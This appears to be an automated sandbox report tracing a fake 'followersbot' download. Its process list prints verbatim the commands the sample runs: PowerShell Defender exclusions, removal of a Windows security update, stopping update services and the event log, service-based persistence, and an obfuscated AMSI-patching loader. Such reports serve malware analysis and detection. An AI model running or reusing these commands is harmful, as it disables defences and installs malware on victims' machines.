PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4660 wrote to memory of 1688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://bit.ly/followersbot_rblx

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x124,0x134,0x7ff9a64a46f8,0x7ff9a64a4708,0x7ff9a64a4718

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5064 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2fc 0x320

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x27c,0x280,0x284,0x120,0x288,0x7ff645495460,0x7ff645495470,0x7ff645495480

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4968 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6736 /prefetch:8

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\followersbot\" -ad -an -ai#7zMap30093:86:7zEvent16032

C:\Windows\System32\smartscreen.exe

C:\Windows\System32\smartscreen.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "HIUOFKBL"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "HIUOFKBL" binpath= "C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HIUOFKBL"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:QhImxjyKWUtT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hVgsrERefJVIGM,[Parameter(Position=1)][Type]$PtfHVZUDZd)$rcUIbefiASF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'flec'+'t'+''+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+'m'+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'l'+[Char](101)+''+'d'+''+[Char](44)+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$rcUIbefiASF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+'c'+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$rcUIbefiASF.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+'bl'+[Char](105)+'c'+[Char](44)+'H'+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'N'+'e'+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$PtfHVZUDZd,$hVgsrERefJVIGM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $rcUIbefiASF.CreateType();}$haMKgsdSFTRfD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+[Char](109)+'.'+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+''+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+'d'+[Char](115)+'');$miJwkyurBBmZzv=$haMKgsdSFTRfD.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MCEMcUxEndYtGJnfutR=QhImxjyKWUtT @([String])([IntPtr]);$WWvOXsWMgytOsqhnblTFBk=QhImxjyKWUtT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JNnwUqbiAGV=$haMKgsdSFTRfD.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+'dle').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$MpDQEUBzVmeZsX=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+'y'+''+[Char](65)+'')));$WisoKjmviHUuuPssW=$miJwkyurBBmZzv.Invoke($Null,@([Object]$JNnwUqbiAGV,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$NylEZcZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MpDQEUBzVmeZsX,$MCEMcUxEndYtGJnfutR).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+'l'+'l'+'');$bZcmgaFQgxxEqstMP=$miJwkyurBBmZzv.Invoke($Null,@([Object]$NylEZcZ,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$stXJLHeppg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,4,[ref]$stXJLHeppg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bZcmgaFQgxxEqstMP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WisoKjmviHUuuPssW,$WWvOXsWMgytOsqhnblTFBk).Invoke($bZcmgaFQgxxEqstMP,[uint32]8,0x20,[ref]$stXJLHeppg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+'l'+'e'+''+[Char](114)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

